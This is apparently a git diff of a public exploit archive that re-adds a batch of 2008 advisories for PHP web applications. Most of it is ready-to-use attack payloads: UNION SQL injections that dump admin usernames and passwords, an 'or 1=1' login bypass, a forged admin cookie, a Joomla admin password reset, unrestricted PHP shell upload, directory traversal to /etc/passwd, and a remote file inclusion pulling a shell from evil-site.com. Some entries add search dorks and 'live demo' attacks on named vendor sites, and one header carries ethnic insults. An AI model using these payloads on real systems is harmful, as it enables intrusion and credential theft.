+# File Delete Vulnerability: upload.php
+#
+# Example:http://creawebs.com.mx/sistema/upload.php?mode=delfile&file=Creando Wiki.pptx
+# Exploit:http://SITE.COM/upload.php?mode=delfile&file=FileName
+#
+# $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
+#
+# XSS Vulnerability: events.php
+#
+#[CODE]
+#  New Event
    ";
+#  }
+#  ?>
+#[/CODE]
+#
+#Exploit :
+# events.php?mode=new&date=XSS CODE
+# events.php?mode=new&date=">
+# -------------------------------
+#
+#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
+#  pigs for dedication : :  WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
+#                      Proud 2 Be ALBANIAN
+#
+# MTK : 0 - 5 : FenerBahçe (H)
+#
+# Not : Fuck off pala! aq lameri.
+# Thnx : All Muslims Albanian & Turkish Coder.. And CrazyShark f0r translate.
+#######################################################
+
+# milw0rm.com [2008-08-10]
diff --git a/platforms/php/webapps/6223.php b/platforms/php/webapps/6223.php
index 2235e948f..8df78f04f 100755
--- a/platforms/php/webapps/6223.php
+++ b/platforms/php/webapps/6223.php
@@ -1,54 +1,54 @@
-
-
-# milw0rm.com [2008-08-10]
+
+
+# milw0rm.com [2008-08-10]
diff --git a/platforms/php/webapps/6225.txt b/platforms/php/webapps/6225.txt
index afa3bfcb9..5cb0baed4 100755
--- a/platforms/php/webapps/6225.txt
+++ b/platforms/php/webapps/6225.txt
@@ -1,48 +1,48 @@
-  ###############################################################################################
-  #                                                                                             #
-  #    ...:::::PHP-Ring Webring System v0.9.1 Insecure Cookie Handling Vulnerability ::::....   #           
-  ###############################################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-
---------
-Discoverd By :virangar security team(hadihadi)
-
-special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
-
-& all virangar members & all hackerz
-
-greetz:to my best friend in the world hadi_aryaie2004
-& my lovely friend arash(imm02tal)
--------
-DESCRIPTION:
-PHP-Ring Webring System , suffers from insecure cookie handling, when a admin login is successfull the script creates
-a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
-contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
-logged in as a legit admin.
----
-vuln code in /admin/wr_admin.php
-
-$cookie = $_COOKIE[admin]; //check for cookie
-
-if (($cookie == "" OR $_GET[stop] == 1 OR !is_admin($cookie)) && $_GET[op] != "login" && $_GET[op] != "logout") {
-    include("../templates/wr_header.php");
-    echo "Enter admin username and password to log in";
-    ....
-    ....
-    ..
-    } else {
-function adminhome() // load admin settings
-
----
-exploit:
-javascript:document.cookie = "admin=1; path=/";
------
-now visit /admin and  you can get admin access and manage the cms ;)
--------
-young iranian h4ck3rz
-
-# milw0rm.com [2008-08-10]
+  ###############################################################################################
+  #                                                                                             #
+  #    ...:::::PHP-Ring Webring System v0.9.1 Insecure Cookie Handling Vulnerability ::::....   #           
+  ###############################################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+
+--------
+Discoverd By :virangar security team(hadihadi)
+
+special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
+
+& all virangar members & all hackerz
+
+greetz:to my best friend in the world hadi_aryaie2004
+& my lovely friend arash(imm02tal)
+-------
+DESCRIPTION:
+PHP-Ring Webring System , suffers from insecure cookie handling, when a admin login is successfull the script creates
+a cookie to show the rest of the admin area the user is already logged in. the bad thing is the cookie doesnt
+contain any password or anything alike, therefor we can craft a admin cookie and make it look like we are
+logged in as a legit admin.
+---
+vuln code in /admin/wr_admin.php
+
+$cookie = $_COOKIE[admin]; //check for cookie
+
+if (($cookie == "" OR $_GET[stop] == 1 OR !is_admin($cookie)) && $_GET[op] != "login" && $_GET[op] != "logout") {
+    include("../templates/wr_header.php");
+    echo "Enter admin username and password to log in";
+    ....
+    ....
+    ..
+    } else {
+function adminhome() // load admin settings
+
+---
+exploit:
+javascript:document.cookie = "admin=1; path=/";
+-----
+now visit /admin and  you can get admin access and manage the cms ;)
+-------
+young iranian h4ck3rz
+
+# milw0rm.com [2008-08-10]
diff --git a/platforms/php/webapps/6226.txt b/platforms/php/webapps/6226.txt
index 606c8f334..086ed8df7 100755
--- a/platforms/php/webapps/6226.txt
+++ b/platforms/php/webapps/6226.txt
@@ -1,48 +1,48 @@
-           
-             ########################################################################
-             #                                                                      #
-             #  ...:::::psipuss version 1.0 SQL Injection Vulnerabilities ::::....  #           
-             ########################################################################
-
-Virangar Security Team
-
-www.virangar.net
-www.virangar.ir
-
---------
-Discoverd By :virangar security team(hadihadi)
-
-special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
-
-& all virangar members & all hackerz
-
-greetz:to my best friend in the world hadi_aryaie2004
-& my lovely friend arash(imm02tal) from ISCN :)
------------------------------------
-vuln code in categories.php:
-line 5: if(!empty($_GET[Cid]))
-{
-        $qCTitle = "select * from `categories` where `Cid` = '$_GET[Cid]'";
-------------
-exploit:
-http://site.com/categories.php?Cid='/**/union/**/select/**/1,concat(Username,0x3a,char(58),Password),3,4,5/**/from/**/users/*
---------------------------------
-                                .::::admin Authentication bypass vuln::::.
-vuln code in login.php:
-                                
-                                
-line 6: $Username = strip_tags($_POST[username]);
-line 7: $Password = strip_tags($_POST[password]);
-..
-..
-..
-line 18: $password11 = $_POST[password];
-line 19:                $qlogin = "select * from `users` where `Username` = '$Username' and `Password` = '$password11' and `Status` = 'Active'";
----
-Exploit:
-User Name:admin ' or 1=1/*
-Password :[whatever]
----
-young iranian h4ck3rz
-
-# milw0rm.com [2008-08-10]
+           
+             ########################################################################
+             #                                                                      #
+             #  ...:::::psipuss version 1.0 SQL Injection Vulnerabilities ::::....  #           
+             ########################################################################
+
+Virangar Security Team
+
+www.virangar.net
+www.virangar.ir
+
+--------
+Discoverd By :virangar security team(hadihadi)
+
+special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra
+
+& all virangar members & all hackerz
+
+greetz:to my best friend in the world hadi_aryaie2004
+& my lovely friend arash(imm02tal) from ISCN :)
+-----------------------------------
+vuln code in categories.php:
+line 5: if(!empty($_GET[Cid]))
+{
+        $qCTitle = "select * from `categories` where `Cid` = '$_GET[Cid]'";
+------------
+exploit:
+http://site.com/categories.php?Cid='/**/union/**/select/**/1,concat(Username,0x3a,char(58),Password),3,4,5/**/from/**/users/*
+--------------------------------
+                                .::::admin Authentication bypass vuln::::.
+vuln code in login.php:
+                                
+                                
+line 6: $Username = strip_tags($_POST[username]);
+line 7: $Password = strip_tags($_POST[password]);
+..
+..
+..
+line 18: $password11 = $_POST[password];
+line 19:                $qlogin = "select * from `users` where `Username` = '$Username' and `Password` = '$password11' and `Status` = 'Active'";
+---
+Exploit:
+User Name:admin ' or 1=1/*
+Password :[whatever]
+---
+young iranian h4ck3rz
+
+# milw0rm.com [2008-08-10]
diff --git a/platforms/php/webapps/6228.txt b/platforms/php/webapps/6228.txt
index 5e4cc19bc..56154199b 100755
--- a/platforms/php/webapps/6228.txt
+++ b/platforms/php/webapps/6228.txt
@@ -1,23 +1,23 @@
-#OpenImpro 1.1(id) Sql Injection Vulnerability
-
-
-
-#Author: nuclear
-
-
-
-#script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip
-
-
-
-#exploit: target.com/image.php?id=-1 union select 1,2,concat(firstname,0x3a,lastname,0x3a,password),4,5,6 from im_person --
-
-
-#Description:
-when you do the injection you will be asked to download a file called image.php . Save it,open with any
-texteditor and get your password ;).
-
-
-#greetz cAs, Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, and me :P
-
-# milw0rm.com [2008-08-10]
+#OpenImpro 1.1(id) Sql Injection Vulnerability
+
+
+
+#Author: nuclear
+
+
+
+#script: http://downloads.sourceforge.net/openimpro/openimpro-1.1.zip
+
+
+
+#exploit: target.com/image.php?id=-1 union select 1,2,concat(firstname,0x3a,lastname,0x3a,password),4,5,6 from im_person --
+
+
+#Description:
+when you do the injection you will be asked to download a file called image.php . Save it,open with any
+texteditor and get your password ;).
+
+
+#greetz cAs, Mi4night, zYzTeM, THE_MAN, Pepe, I-O-W-A, Digitalfortress, DiGitalX, sys32-hack, sys32r, and me :P
+
+# milw0rm.com [2008-08-10]
diff --git a/platforms/php/webapps/6230.txt b/platforms/php/webapps/6230.txt
index 18fcf8b13..41e8e15e5 100755
--- a/platforms/php/webapps/6230.txt
+++ b/platforms/php/webapps/6230.txt
@@ -1,49 +1,49 @@
-|___________________________________________________|
-|
-|  ZeeBuddy v2.1(adid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.zeescripts.com
-|
-|___________________________________________________|
-
-Exploit:  
-
-www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
-
-
-
-L!VE DEMO: :
-
-
-http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,version(),4,5,6,7,8,9+from+admin--
-
-
-http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
-
-
-
-____________________________( Greetz )____________________________
-|
-| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
-|   
-| CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n 
-|
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-08-11]
+|___________________________________________________|
+|
+|  ZeeBuddy v2.1(adid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.zeescripts.com
+|
+|___________________________________________________|
+
+Exploit:  
+
+www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
+
+
+
+L!VE DEMO: :
+
+
+http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,version(),4,5,6,7,8,9+from+admin--
+
+
+http://www.zeebuddy.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
+
+
+
+____________________________( Greetz )____________________________
+|
+| tryag.cc | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | str0ke
+|   
+| CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n 
+|
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-08-11]
diff --git a/platforms/php/webapps/6231.txt b/platforms/php/webapps/6231.txt
index c9b7b33d2..6d7d038ab 100755
--- a/platforms/php/webapps/6231.txt
+++ b/platforms/php/webapps/6231.txt
@@ -1,16 +1,16 @@
-Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities
-cript : Ppim v1.0
-Download : http://scripts.ringsworld.com/organizers/ppim.zip
-By Stack
-Poc 1: change password
-for change password go to this link
-http://localhost/ppim/changepassword.php
-writhe your password and confirm it
-
-Poc 2 : upload
-http://localhost/ppim/upload.php
-you can upload you php shell in this link
-after you go here
-http://localhost/ppim/shell.php
-
-# milw0rm.com [2008-08-11]
+Ppim <= 1.0 (upload/change password) Multiple Vulnerabilities
+cript : Ppim v1.0
+Download : http://scripts.ringsworld.com/organizers/ppim.zip
+By Stack
+Poc 1: change password
+for change password go to this link
+http://localhost/ppim/changepassword.php
+writhe your password and confirm it
+
+Poc 2 : upload
+http://localhost/ppim/upload.php
+you can upload you php shell in this link
+after you go here
+http://localhost/ppim/shell.php
+
+# milw0rm.com [2008-08-11]
diff --git a/platforms/php/webapps/6232.txt b/platforms/php/webapps/6232.txt
index 5b65e744a..713987394 100755
--- a/platforms/php/webapps/6232.txt
+++ b/platforms/php/webapps/6232.txt
@@ -1,28 +1,28 @@
-#####################################################################################
-####                       Ovidentia 6.6.5 Sql Injection                         ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
-#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
-#####################################################################################
-#                                                                                   #
-#Script Download : www.ovidentia.org                                                #
-#                                                                                   #
-#DORK : "Powered by Ovidentia"                                                      #
-#                                                                                   #
-#####################################################################################
-#                                      [Bug]                                        #
-#                                                                                   #
-#http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
-#                                                                                   #
-#                                     [Note]                                        #
-#                                                                                   #
-#You must login by a simple user and then use bug  ;)                                 #
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-08-11]
+#####################################################################################
+####                       Ovidentia 6.6.5 Sql Injection                         ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
+#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
+#####################################################################################
+#                                                                                   #
+#Script Download : www.ovidentia.org                                                #
+#                                                                                   #
+#DORK : "Powered by Ovidentia"                                                      #
+#                                                                                   #
+#####################################################################################
+#                                      [Bug]                                        #
+#                                                                                   #
+#http://Site/index.php?tg=contact&idx=modify&item=-99999'+union+select+0,1,2,concat(0x6E69636B6E616D65,0x3A,nickname),concat(0x70617373776F7264,0x3A,password),5,6,7,8,9,10,11,12,13,14+from+bab_users/*
+#                                                                                   #
+#                                     [Note]                                        #
+#                                                                                   #
+#You must login by a simple user and then use bug  ;)                                 #
+#                                                                                   #
+#####################################################################################
+#                           Site : Http://IRCRASH.COM                               #
+###################################### TNX GOD ######################################
+
+# milw0rm.com [2008-08-11]
diff --git a/platforms/php/webapps/6233.txt b/platforms/php/webapps/6233.txt
index bfe2d118f..be4b42705 100755
--- a/platforms/php/webapps/6233.txt
+++ b/platforms/php/webapps/6233.txt
@@ -1,20 +1,20 @@
-#######################################################
-########## BBlog 0.7.6 SQL Injection Vuln #############
-#######################################################
-#
-# Vulnpath: /bblog_plugins/builtin.help.php
-# 
-# Vuln: if($_GET['mod']) $pluginrow = $bBlog->get_row("select * from ".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'");
-#
-#
-#
-# PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors--
-#
-# help: On the number you can see you have to set:
-#       concat_ws(0x3a,id,nickname,password,email,icq) 
-#
-#
-# Found by: IP-Sh0k
-#######################################################
-
-# milw0rm.com [2008-08-12]
+#######################################################
+########## BBlog 0.7.6 SQL Injection Vuln #############
+#######################################################
+#
+# Vulnpath: /bblog_plugins/builtin.help.php
+# 
+# Vuln: if($_GET['mod']) $pluginrow = $bBlog->get_row("select * from ".T_PLUGINS." where name='".$_GET['mod']."' and type='modifier'");
+#
+#
+#
+# PoC: ?pid=1&mod='+union+select+1,2,3,4,5,6,7,8,9,10,11,12+from+bb_authors--
+#
+# help: On the number you can see you have to set:
+#       concat_ws(0x3a,id,nickname,password,email,icq) 
+#
+#
+# Found by: IP-Sh0k
+#######################################################
+
+# milw0rm.com [2008-08-12]
diff --git a/platforms/php/webapps/6234.txt b/platforms/php/webapps/6234.txt
index 1deb32bed..6a57cd1fa 100755
--- a/platforms/php/webapps/6234.txt
+++ b/platforms/php/webapps/6234.txt
@@ -1,90 +1,90 @@
-#####################################################################################
-####                     Joomla 1.5.x Remote Admin Password Change               ####
-#####################################################################################
-#                                                                                   #
-# Author: d3m0n (d3m0n@o2.pl)                                                       #
-# Greets: GregStar, gorion, d3d!k                                                   #
-#                                                                                   #
-# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
-#                                                                                   #
-#####################################################################################
-
-
-
-File : /components/com_user/controller.php
-
-#####################################################################################
-Line : 379-399
- 
-	function confirmreset()
-	{
-		// Check for request forgeries
-		JRequest::checkToken() or die( 'Invalid Token' );
-
-		// Get the input
-		$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1} 
-                  
-		// Get the model
-		$model = &$this->getModel('Reset');
-
-		// Verify the token
-		if ($model->confirmReset($token) === false)   < --- {2}
-		{
-			$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
-			$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
-			return false;
-		}
-
-		$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
-	}
-	
-#####################################################################################
-	
-File : /components/com_user/models/reset.php
-
-Line: 111-130 	
-	
-	
-	
-	function confirmReset($token)
-	{
-		global $mainframe;
-
-		$db	= &JFactory::getDBO();
-		$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ---- {3} 
-
-		// Verify the token
-		if (!($id = $db->loadResult()))
-		{
-			$this->setError(JText::_('INVALID_TOKEN'));
-			return false;
-		}
-
-		// Push the token and user id into the session
-		$mainframe->setUserState($this->_namespace.'token',	$token);
-		$mainframe->setUserState($this->_namespace.'id',	$id);
-
-		return true;
-	}
-#####################################################################################
-
-
-
-{1} - Replace ' with empty char
-{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
-
-
-Example :
-
-
-1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
-
-2. Write into field "token" char ' and Click OK.
-
-3. Write new password for admin
-
-4. Go to url : target.com/administrator/
-
-5. Login admin with new password
-
-# milw0rm.com [2008-08-12]
+#####################################################################################
+####                     Joomla 1.5.x Remote Admin Password Change               ####
+#####################################################################################
+#                                                                                   #
+# Author: d3m0n (d3m0n@o2.pl)                                                       #
+# Greets: GregStar, gorion, d3d!k                                                   #
+#                                                                                   #
+# Polish "hackers" used this bug to deface turkish sites BUAHAHHA nice 0-day pff    #
+#                                                                                   #
+#####################################################################################
+
+
+
+File : /components/com_user/controller.php
+
+#####################################################################################
+Line : 379-399
+ 
+	function confirmreset()
+	{
+		// Check for request forgeries
+		JRequest::checkToken() or die( 'Invalid Token' );
+
+		// Get the input
+		$token = JRequest::getVar('token', null, 'post', 'alnum');              < --- {1} 
+                  
+		// Get the model
+		$model = &$this->getModel('Reset');
+
+		// Verify the token
+		if ($model->confirmReset($token) === false)   < --- {2}
+		{
+			$message = JText::sprintf('PASSWORD_RESET_CONFIRMATION_FAILED', $model->getError());
+			$this->setRedirect('index.php?option=com_user&view=reset&layout=confirm', $message);
+			return false;
+		}
+
+		$this->setRedirect('index.php?option=com_user&view=reset&layout=complete');
+	}
+	
+#####################################################################################
+	
+File : /components/com_user/models/reset.php
+
+Line: 111-130 	
+	
+	
+	
+	function confirmReset($token)
+	{
+		global $mainframe;
+
+		$db	= &JFactory::getDBO();
+		$db->setQuery('SELECT id FROM #__users WHERE block = 0 AND activation = '.$db->Quote($token));  < ---- {3} 
+
+		// Verify the token
+		if (!($id = $db->loadResult()))
+		{
+			$this->setError(JText::_('INVALID_TOKEN'));
+			return false;
+		}
+
+		// Push the token and user id into the session
+		$mainframe->setUserState($this->_namespace.'token',	$token);
+		$mainframe->setUserState($this->_namespace.'id',	$id);
+
+		return true;
+	}
+#####################################################################################
+
+
+
+{1} - Replace ' with empty char
+{3} - If you enter ' in token field then query will be looks like : "SELECT id FROM jos_users WHERE block = 0 AND activation = '' "
+
+
+Example :
+
+
+1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
+
+2. Write into field "token" char ' and Click OK.
+
+3. Write new password for admin
+
+4. Go to url : target.com/administrator/
+
+5. Login admin with new password
+
+# milw0rm.com [2008-08-12]
diff --git a/platforms/php/webapps/6235.txt b/platforms/php/webapps/6235.txt
index b00dcb5f8..e028de1d3 100755
--- a/platforms/php/webapps/6235.txt
+++ b/platforms/php/webapps/6235.txt
@@ -1,26 +1,26 @@
-=---------------------------------------------=
-=                ,.:oO0^-^0Oo:.,              =
-=                      JIKO                   =
-=                '':0Oov-voO0:''              =
-=---------------------------------------------=
-----------------------=JIKO=-------------------
-| Autor    :> jiko
-| Home     :> WwW.No-Exploit.CoM
-| Script   :> gelato CMS
-| Bug      :> Remote File Disclosure Vulnerability
-| Download :> http://www.gelatocms.com/
-_______________________________________________
-=                   JIKI TEAm                 =
-_______________________________________________
-| Exploit:
-.:|http://localhost/[Script]/classes/imgsize.php?img=[file]
-~EX
-.:|http://localhost/[script]/classes/imgsize.php?img=../index.php
-| Greetz :
-.:| Stack & Gold_M & HaCkeR_EgY  All Member wwW.No-Exploit.CoM
-----------------------=JIKO=-------------------
-=---------------------------------------------=
-=                   JIKI TEAm                 =
-=---------------------------------------------=
-
-# milw0rm.com [2008-08-13]
+=---------------------------------------------=
+=                ,.:oO0^-^0Oo:.,              =
+=                      JIKO                   =
+=                '':0Oov-voO0:''              =
+=---------------------------------------------=
+----------------------=JIKO=-------------------
+| Autor    :> jiko
+| Home     :> WwW.No-Exploit.CoM
+| Script   :> gelato CMS
+| Bug      :> Remote File Disclosure Vulnerability
+| Download :> http://www.gelatocms.com/
+_______________________________________________
+=                   JIKI TEAm                 =
+_______________________________________________
+| Exploit:
+.:|http://localhost/[Script]/classes/imgsize.php?img=[file]
+~EX
+.:|http://localhost/[script]/classes/imgsize.php?img=../index.php
+| Greetz :
+.:| Stack & Gold_M & HaCkeR_EgY  All Member wwW.No-Exploit.CoM
+----------------------=JIKO=-------------------
+=---------------------------------------------=
+=                   JIKI TEAm                 =
+=---------------------------------------------=
+
+# milw0rm.com [2008-08-13]
diff --git a/platforms/php/webapps/6247.txt b/platforms/php/webapps/6247.txt
index 7d407f754..1ba4eff0a 100755
--- a/platforms/php/webapps/6247.txt
+++ b/platforms/php/webapps/6247.txt
@@ -1,21 +1,21 @@
-++++++++++++++++++++++++++++++++++++++++++++++++++++++
-+ script:dotCMS
-+ home: http://www.dotcms.org
-+ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
-+ founder: Don of h4cky0u.org
-+ Vulnerability: Directory traversal
-++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-exploit:
-/index.dot?id=../../../../../../../../etc/passwd%00.jpg
-/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
-
-example:
-http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
-http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
-
-solution:
-Script should filter meta characters from user input.
-+++++++++++++++++++++++++++++++++++++++++++++++++++++++
-
-# milw0rm.com [2008-08-15]
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
++ script:dotCMS
++ home: http://www.dotcms.org
++ demo: http://www.dotcms.org/the_dotcms/demos/demo.dot
++ founder: Don of h4cky0u.org
++ Vulnerability: Directory traversal
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+exploit:
+/index.dot?id=../../../../../../../../etc/passwd%00.jpg
+/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
+
+example:
+http://demo.dotcms.org/news/index.dot?id=../../../../../../../../etc/passwd%00.jpg
+http://demo.dotcms.org/getting_started/macros/macros_detail.dot?id=../../../../../../../../etc/passwd%00.html
+
+solution:
+Script should filter meta characters from user input.
++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+# milw0rm.com [2008-08-15]
diff --git a/platforms/php/webapps/6249.txt b/platforms/php/webapps/6249.txt
index 63ade73c7..f9b27a2b1 100755
--- a/platforms/php/webapps/6249.txt
+++ b/platforms/php/webapps/6249.txt
@@ -1,60 +1,60 @@
-|___________________________________________________|
-|
-| ZEEJOBSITE v2.0  (bannerclick.php adid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|---------------------Hussin X----------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  www.tryag.cc/cc
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script http://zeeways.com/main/products/ZEEJOBSITE-v2.0.html
-|
-| DorK : inurl:employer_profile.php?compid=
-|___________________________________________________|
-
-Exploit:  
-________
-
-
-
-www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.zeejobsite.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
-
-
-
-
-___________________
-
-
-Admin  LogiN :
-
-www.[target].com/Script/admin/
-
-
-____________________________( Greetz )____________________________
-|
-|  tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
-|   
-|  jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke
-|_________________________________________________________________
-
-
-                       Im IRAQi
-
-# milw0rm.com [2008-08-15]
+|___________________________________________________|
+|
+| ZEEJOBSITE v2.0  (bannerclick.php adid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|---------------------Hussin X----------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  www.tryag.cc/cc
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script http://zeeways.com/main/products/ZEEJOBSITE-v2.0.html
+|
+| DorK : inurl:employer_profile.php?compid=
+|___________________________________________________|
+
+Exploit:  
+________
+
+
+
+www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.zeejobsite.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--
+
+
+
+
+___________________
+
+
+Admin  LogiN :
+
+www.[target].com/Script/admin/
+
+
+____________________________( Greetz )____________________________
+|
+|  tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
+|   
+|  jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke
+|_________________________________________________________________
+
+
+                       Im IRAQi
+
+# milw0rm.com [2008-08-15]
diff --git a/platforms/php/webapps/6250.txt b/platforms/php/webapps/6250.txt
index d3ab9b04a..d0664c769 100755
--- a/platforms/php/webapps/6250.txt
+++ b/platforms/php/webapps/6250.txt
@@ -1,31 +1,31 @@
-#####################################################################################
-####                        DeeEmm CMS Sql Injection/Rfi                         ####
-#####################################################################################
-#                                                                                   #
-#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
-#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
-#Our Site : Http://IRCRASH.COM                                                      #
-#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
-#####################################################################################
-#                                                                                   #
-#Script Download : http://surfnet.dl.sourceforge.net/sourceforge/dmcms/dmcms_074.tar.gz
-#                                                                                   #
-#Home Page : www.deeemm.com                                                         #
-#                                                                                   #
-#DORK : "DeeEmm CMS"                                                                #
-#                                                                                   #
-#####################################################################################
-#                                      [Rfi]                                        #
-#                                                                                   #
-#http://Site/user_language.php?INDM=r3d.w0rm&language_dir=http://evil-site.com/shell.txt?
-#                                                                                   #
-#                                 [Sql Injection]                                   #
-#                                                                                   #
-#http://Site/index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users/*                                #
-#http://Site/index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users                                #
-#                                                                                   #
-#####################################################################################
-#                           Site : Http://IRCRASH.COM                               #
-###################################### TNX GOD ######################################
-
-# milw0rm.com [2008-08-15]
+#####################################################################################
+####                        DeeEmm CMS Sql Injection/Rfi                         ####
+#####################################################################################
+#                                                                                   #
+#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
+#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
+#Our Site : Http://IRCRASH.COM                                                      #
+#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
+#####################################################################################
+#                                                                                   #
+#Script Download : http://surfnet.dl.sourceforge.net/sourceforge/dmcms/dmcms_074.tar.gz
+#                                                                                   #
+#Home Page : www.deeemm.com                                                         #
+#                                                                                   #
+#DORK : "DeeEmm CMS"                                                                #
+#                                                                                   #
+#####################################################################################
+#                                      [Rfi]                                        #
+#                                                                                   #
+#http://Site/user_language.php?INDM=r3d.w0rm&language_dir=http://evil-site.com/shell.txt?
+#                                                                                   #
+#                                 [Sql Injection]                                   #
+#                                                                                   #
+#http://Site/index.php?page=media`+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users/*                                #
+#http://Site/index.php?page=media&id=-99999+union+select+0,1,2,4,5,6,7,8,9,user_name,11,password,13,14,15,16,17,18,19,20,21+from+deeemm_users                                #
+#                                                                                   #
+#####################################################################################
